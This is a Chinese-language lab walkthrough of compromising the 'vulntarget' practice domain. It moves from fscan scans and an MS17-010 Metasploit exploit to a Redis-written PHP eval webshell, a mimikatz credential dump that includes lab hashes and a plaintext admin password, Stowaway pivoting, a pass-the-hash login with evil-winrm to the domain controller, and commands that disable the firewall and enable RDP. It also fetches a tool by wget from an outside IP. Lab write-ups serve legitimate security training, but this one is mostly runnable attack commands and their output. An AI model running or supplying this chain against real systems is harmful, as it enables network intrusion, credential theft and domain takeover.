192.168.52.132 外网目标ip
fscan扫一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 ┌──(root㉿kali)-[~/vulntarget] └─# ./fscan_amd64 -h 192.168.52.132 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan (icmp) Target 192.168.52.132 is alive [*] Icmp alive hosts len is: 1 192.168.52.132:110 open 192.168.52.132:80 open 192.168.52.132:135 open 192.168.52.132:139 open 192.168.52.132:445 open 192.168.52.132:1188 open 192.168.52.132:3336 open 192.168.52.132:5357 open 192.168.52.132:8750 open [*] alive ports len is: 9 start vulscan [*] NetInfo: [*]192.168.52.132 [->]win7-PC [->]192.168.52.132 [->]10.0.20.128 [*] WebTitle: http://192.168.52.132:8750 code:403 len:564 title:403 Forbidden [+] 192.168.52.132 MS17-010 (Windows 7 Professional 7601 Service Pack 1) [*] WebTitle: http://192.168.52.132:5357 code:503 len:326 title:Service Unavailable [*] WebTitle: http://192.168.52.132 code:200 len:10065 title:通达OA网络智能办公系统 [+] InfoScan:http://192.168.52.132 [通达OA] [+] http://192.168.52.132 tongda-user-session-disclosure [+] http://192.168.52.132:8750 tongda-user-session-disclosure 已完成 9/9 [*] 扫描结束,耗时: 18.303575184s
1 2 3 4 信息整理一下 192.168.52.132 通达存在漏洞 MS-17 名字Win7-PC 常规端口 10.0.20.128 内网地址
直接打MS17就行了
1 2 3 4 search MS17 use 0 set rhosts 192.168.52.132 run
直接上线 开始信息收集一下
1 2 3 netsh advfirewall set allprofiles state off 关闭防火墙命令 不关闭防火墙的话 MSF和cs的马都上不去
1 2 3 4 5 6 7 8 9 10 11 12 13 Ethernet adapter �������� 2: Connection-specific DNS Suffix . : localdomain Link-local IPv6 Address . . . . . : fe80::55ef:46ff:3f4:a6b3%13 IPv4 Address. . . . . . . . . . . : 10.0.20.128 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : Ethernet adapter ��������: Connection-specific DNS Suffix . : localdomain Link-local IPv6 Address . . . . . : fe80::1c54:a862:b6a5:1f6c%11 IPv4 Address. . . . . . . . . . . : 192.168.52.132
收集到的信息
1 2 192.168.52.132 外网地址 10.0.20.128 内网地址
上传一个fscan扫一下内网 并且上代理
1 2 3 4 5 wget http://101.42.39.110:3389/fscan64.exe 这里我是用msf的upload模块来上传这个fscan64.exe upload fscan64.exe C:\\
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 C:\>fscan64.exe -h 10.0.20.0/24 -p 1-10000 fscan64.exe -h 10.0.20.0/24 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan (icmp) Target 10.0.20.128 is alive (icmp) Target 10.0.20.130 is alive [*] Icmp alive hosts len is: 2 10.0.20.130:80 open 10.0.20.128:80 open 10.0.20.128:110 open 10.0.20.128:135 open 10.0.20.130:139 open 10.0.20.128:139 open 10.0.20.130:135 open 10.0.20.128:445 open 10.0.20.130:445 open 10.0.20.128:1188 open 10.0.20.128:3336 open 10.0.20.128:5357 open 10.0.20.130:5985 open 10.0.20.130:6379 open 10.0.20.128:8750 open [*] alive ports len is: 15 start vulscan [+] 10.0.20.128 MS17-010 (Windows 7 Professional 7601 Service Pack 1) [*] NetInfo: [*]10.0.20.128 [->]win7-PC [->]192.168.52.132 [->]10.0.20.128 [*] WebTitle: http://10.0.20.128:8750 code:403 len:564 title:403 Forbidden [*] WebTitle: http://10.0.20.128 code:200 len:10065 title:通达OA网络智能办公系统 [*] NetInfo: [*]10.0.20.130 [->]win2016 [->]10.0.10.111 [->]10.0.20.130 [+] Redis:10.0.20.130:6379 unauthorized file:C:\Program Files\Redis/dump.rdb [*] WebTitle: http://10.0.20.130 code:200 len:11 title:None [+] InfoScan:http://10.0.20.128 [通达OA] [*] WebTitle: http://10.0.20.128:5357 code:503 len:326 title:Service Unavailable [*] NetBios: 10.0.20.130 win2016.vulntarget.com Windows Server 2016 Datacenter 14393 [*] WebTitle: http://10.0.20.130:5985 code:404 len:315 title:Not Found [+] http://10.0.20.128 tongda-user-session-disclosure [+] http://10.0.20.128:8750 tongda-user-session-disclosure [+] http://10.0.20.128:8750 poc-yaml-tongda-oa-v11.9-api.ali.php-fileupload 已完成 15/15 [*] 扫描结束,耗时: 56.0155853s
信息整理一下 一共就是两个ip
1 2 3 4 5 6 7 8 10.0.20.128 10.0.20.130 这个就是域里的一台机器 5985 6379 win2016.vulntarget.com 域 vulntarget.com 6379端口是存在未授权的 这里的这台win16机器的网络地址 10.0.20.130 10.0.10.111
上stowaway挂代理
然后扫一下目录 发现phpinfo.php文件
找到网站目录 然后因为redis纯在未授权 然后我们直接上传shell就行了
1 2 3 4 5 6 7 8 config set dir "C:/phpStudy/PHPTutorial/WWW/" config set dbfilename 1.php set 1 "<?php @eval($_POST['1']);?>" save
成功写入 然后上蚁剑
上传fscan扫一下内网
1 2 3 4 5 6 7 IPv4 地址 . . . . . . . . . . . . : 10.0.20.130 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 以太网适配器 Ethernet1: 连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::a195:ff2a:a6da:221c%12 IPv4 地址 . . . . . . . . . . . . : 10.0.10.111
但是蚁剑这个终端的话太抽象了 fscan扫不了 于是上Viper
上线成功 开始扫一下内网
1 fscan64.exe -h 10.0.10.0/24 -p 1-10000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 C:\phpStudy\PHPTutorial\WWW>type result.txt type result.txt 10.0.10.110:53 open 10.0.10.110:88 open 10.0.10.111:80 open 10.0.10.110:139 open 10.0.10.110:135 open 10.0.10.111:135 open 10.0.10.111:139 open 10.0.10.110:389 open 10.0.10.110:445 open 10.0.10.111:445 open 10.0.10.110:464 open 10.0.10.110:593 open 10.0.10.110:636 open 10.0.10.110:3268 open 10.0.10.110:3269 open 10.0.10.111:5985 open 10.0.10.110:5985 open 10.0.10.111:6379 open 10.0.10.110:9389 open [+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php [*] WebTitle: http://10.0.10.111 code:200 len:11 title:None [*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019 [*] WebTitle: http://10.0.10.111:5985 code:404 len:315 title:Not Found [*] NetInfo: [*]10.0.10.110 [->]win2019 [->]10.0.10.110 [*] WebTitle: http://10.0.10.110:5985 code:404 len:315 title:Not Found 10.0.10.110:135 open 10.0.10.111:135 open 10.0.10.110:139 open 10.0.10.110:88 open 10.0.10.111:80 open 10.0.10.111:139 open 10.0.10.110:53 open 10.0.10.110:389 open 10.0.10.110:445 open 10.0.10.111:445 open 10.0.10.110:464 open 10.0.10.110:593 open 10.0.10.110:636 open 10.0.10.110:3268 open 10.0.10.110:3269 open 10.0.10.111:5985 open 10.0.10.110:5985 open 10.0.10.111:6379 open 10.0.10.110:9389 open [+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php [*] WebTitle: http://10.0.10.111 code:200 len:11 title:None [*] WebTitle: http://10.0.10.111:5985 code:404 len:315 title:Not Found [*] NetInfo: [*]10.0.10.110 [->]win2019 [->]10.0.10.110 [*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019 [*] WebTitle: http://10.0.10.110:5985 code:404 len:315 title:Not Found
发现域控了
1 2 10.0.10.110 DC VULNTARGET\WIN2019 开了个5985端口 winrm服务
收集一下域内win16的信息 看看有没有能到域控的方法
1 2 3 跑一下sharphound 上传sharphound上去 然后跑就行了 SharpHound.exe --CollectionMethods All --Domain vulntarget.com --ExcludeDCs
这里就是关键了 因为域管登录过win16这台机器 所以留下了凭据
我们直接上mimikatz跑logonpassword就行了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 Authentication Id : 0 ; 329364 (00000000:00050694) Session : Interactive from 1 User Name : win2016 Domain : VULNTARGET Logon Server : WIN2019 Logon Time : 2023/11/11 22:30:17 SID : S-1-5-21-3795598892-1521228294-2653055093-1601 msv : [00000005] Primary * Username : win2016 * Domain : VULNTARGET * NTLM : dfc8d2bfa540a0a6e2248a82322e654e * SHA1 : cfa10f59337120a5ea6882b11c1c9f451f5f4ea6 * DPAPI : 27bd7cc4802079a6e008ed2d917c4323 tspkg : wdigest : * Username : win2016 * Domain : VULNTARGET * Password : (null) kerberos : * Username : win2016 * Domain : VULNTARGET.COM * Password : (null) ssp : credman : Authentication Id : 0 ; 71684 (00000000:00011804) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2023/11/11 22:29:13 SID : S-1-5-90-0-1 msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : e0cd419213811fd910ca6c3c42d764e7 * SHA1 : cd721f807e68ce07a4d0fe80b9356e93986d5ef1 tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : WIN2016$ * Domain : vulntarget.com * Password : NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ ssp : credman : Authentication Id : 0 ; 71573 (00000000:00011795) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2023/11/11 22:29:13 SID : S-1-5-90-0-1 msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : 1ee53d0627d3a9c940d6579e3ea1d158 * SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : WIN2016$ * Domain : vulntarget.com * Password : 27 7d f9 fa 4a f9 61 25 60 4e 75 42 f7 d9 c6 a0 60 c7 f1 eb 48 b3 73 bf 64 0e dd 5b 92 46 f1 2a cb 7d 19 a4 38 19 aa fb 8a a7 56 ca 40 fb 07 3b f3 c7 d4 ca b7 f3 32 49 56 92 69 78 a0 f4 66 5b 8a 40 46 9e ac 7e dc a7 18 85 68 68 65 d1 b3 1a b3 8b 76 e8 c8 ec 18 58 78 86 10 0e ae 1d 2f b5 ac 9c 29 2c c9 6e d6 eb f3 70 91 fd f4 12 11 e0 8d 48 e4 89 20 73 f4 c0 ae d3 d0 f1 45 e0 be e3 39 6a 8f 7e a4 08 4c a7 41 3d ef 23 ad 19 f4 c1 21 b1 9e 81 39 99 33 d3 8f 83 d6 49 02 59 f7 b9 6d 63 bb 2e 50 be 8f 4e f4 37 7a fa 13 95 93 d6 80 96 c0 d1 7b c6 2c 90 ca 1e 0a da 42 8b 3e 92 c7 65 85 45 41 a4 b6 76 21 35 e2 96 94 a4 07 28 c3 49 d9 31 05 24 28 07 de 8c 64 fa 8d 93 d3 ed ec 4c 75 e5 e1 05 bc 6f 6b 41 ef ed d9 f2 43 a4 ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN2016$ Domain : VULNTARGET Logon Server : (null) Logon Time : 2023/11/11 22:29:13 SID : S-1-5-20 msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : 1ee53d0627d3a9c940d6579e3ea1d158 * SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : win2016$ * Domain : VULNTARGET.COM * Password : (null) ssp : credman : Authentication Id : 0 ; 41061 (00000000:0000a065) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2023/11/11 22:29:13 SID : msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : 1ee53d0627d3a9c940d6579e3ea1d158 * SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 548857 (00000000:00085ff9) Session : CachedInteractive from 1 User Name : Administrator Domain : VULNTARGET Logon Server : WIN2019 Logon Time : 2023/11/11 22:31:21 SID : S-1-5-21-3795598892-1521228294-2653055093-500 msv : [00000005] Primary * Username : Administrator * Domain : VULNTARGET * NTLM : c7c654da31ce51cbeecfef99e637be15 * SHA1 : 20045722851488e55f32110eb0a5222ba793fe2f * DPAPI : 4df31630e621c2278c303c0940d878ff tspkg : wdigest : * Username : Administrator * Domain : VULNTARGET * Password : (null) kerberos : * Username : Administrator * Domain : VULNTARGET.COM * Password : Admin@666 ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/11/11 22:29:13 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : WIN2016$ Domain : VULNTARGET Logon Server : (null) Logon Time : 2023/11/11 22:29:13 SID : S-1-5-18 msv : tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : win2016$ * Domain : VULNTARGET.COM * Password : (null) ssp : credman :
然后找了这个域管的hash值
1 2 3 4 5 6 [00000005] Primary * Username : Administrator * Domain : VULNTARGET * NTLM : c7c654da31ce51cbeecfef99e637be15 * SHA1 : 20045722851488e55f32110eb0a5222ba793fe2f * DPAPI : 4df31630e621c2278c303c0940d878ff
因为这个域管在10段 所以得上二级代理
https://www.freebuf.com/sectool/359841.htmlStowaway
早win7机器上再开一个端口
然后使用win16机器连接这个端口
1 agent.exe -c 10.0.20.128:1235
然后给proxifier再加上一条规则
再proxychains这个配置文件上再加上这一条就行了
因为我们获取了域管的hash值 那么我们就直接evil-winrm登录就行了
1 proxychains evil-winrm -i 10.0.10.110 -u Administrator -H "c7c654da31ce51cbeecfef99e637be15"
拿下了
最后讲一下怎么再没开启3389的情况下开启3389端口
1 2 3 4 5 6 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
这里得获取到域控之后才有权限
(这里我没尝试成功 先存着 以后可能有用)
就是第二步的时候出错
关闭防火墙命令
1 netsh advfirewall set allprofiles state off
新的知识点就是学会了这个 二级代理
二级代理同样能上 viper 但是注意的一点就是 防火墙必须得关掉
1 netsh advfirewall set allprofiles state off
